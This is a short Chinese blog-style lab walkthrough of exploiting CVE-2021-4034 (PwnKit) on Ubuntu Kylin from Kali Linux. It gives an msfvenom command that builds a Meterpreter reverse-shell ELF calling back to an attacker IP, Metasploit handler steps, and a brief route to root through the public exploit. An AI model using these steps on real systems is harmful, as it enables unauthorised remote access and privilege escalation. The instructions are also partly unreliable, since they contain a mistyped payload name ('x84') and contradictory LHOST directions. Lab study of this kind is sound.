赞
踩
https://github.com/berdav/CVE-2021-4034
Ubuntu Kylin(20.04):作为受攻击目标。
Kali Linux(2021):作为攻击者的攻击平台。
首先确保两台主机之间的网络连接:确保Ubuntu Kylin和Kali Linux之间可以进行网络通信
在kali上生成后门脚本文件:参考下面命令(IP地址需要更改)
msfvenom -p linux/x84/meterpreter/reverse_tcp LHOST=192.168.153.152 LPORT=4444 -f elf -o shell.elf
进入kali的msf选择对应的模块:
use exploit/multi/handler
设置set payload为 和linux相关
设置LHOST为靶机的地址
运行:run,同时在靶机上运行上传的后门脚本(.elf文件)
在kali上可以监听到靶机:(如图所示)
上传漏洞利用脚本代码和工具
编译和运行程序,获得一个root管理员权限
查看当前用户信息
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。